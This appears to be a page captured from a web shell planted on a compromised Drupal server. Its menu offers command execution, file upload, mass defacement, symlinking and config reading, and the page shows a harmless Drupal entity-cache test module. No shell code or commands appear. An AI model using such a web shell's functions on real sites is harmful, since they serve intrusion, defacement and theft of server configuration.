OFF | cURL : OFF | WGET : ON | Perl : ON | Python : OFF Directory (0775) : /var/www/html/../html/marc-drupal/modules/simpletest/tests/ |
Home | ☍ Command | ☍ Upload File | ☍Info Server | ☍ Buat File | ☍ Mass deface | ☍ Jumping | ☍ Config | ☍ Symlink | ☍ About |
---|
<?php /** * @file * Helper module for entity cache tests. */ /** * Implements hook_entity_info(). */ function entity_cache_test_dependency_entity_info() { return array( 'entity_cache_test' => array( 'label' => variable_get('entity_cache_test_label', 'Entity Cache Test'), ), ); }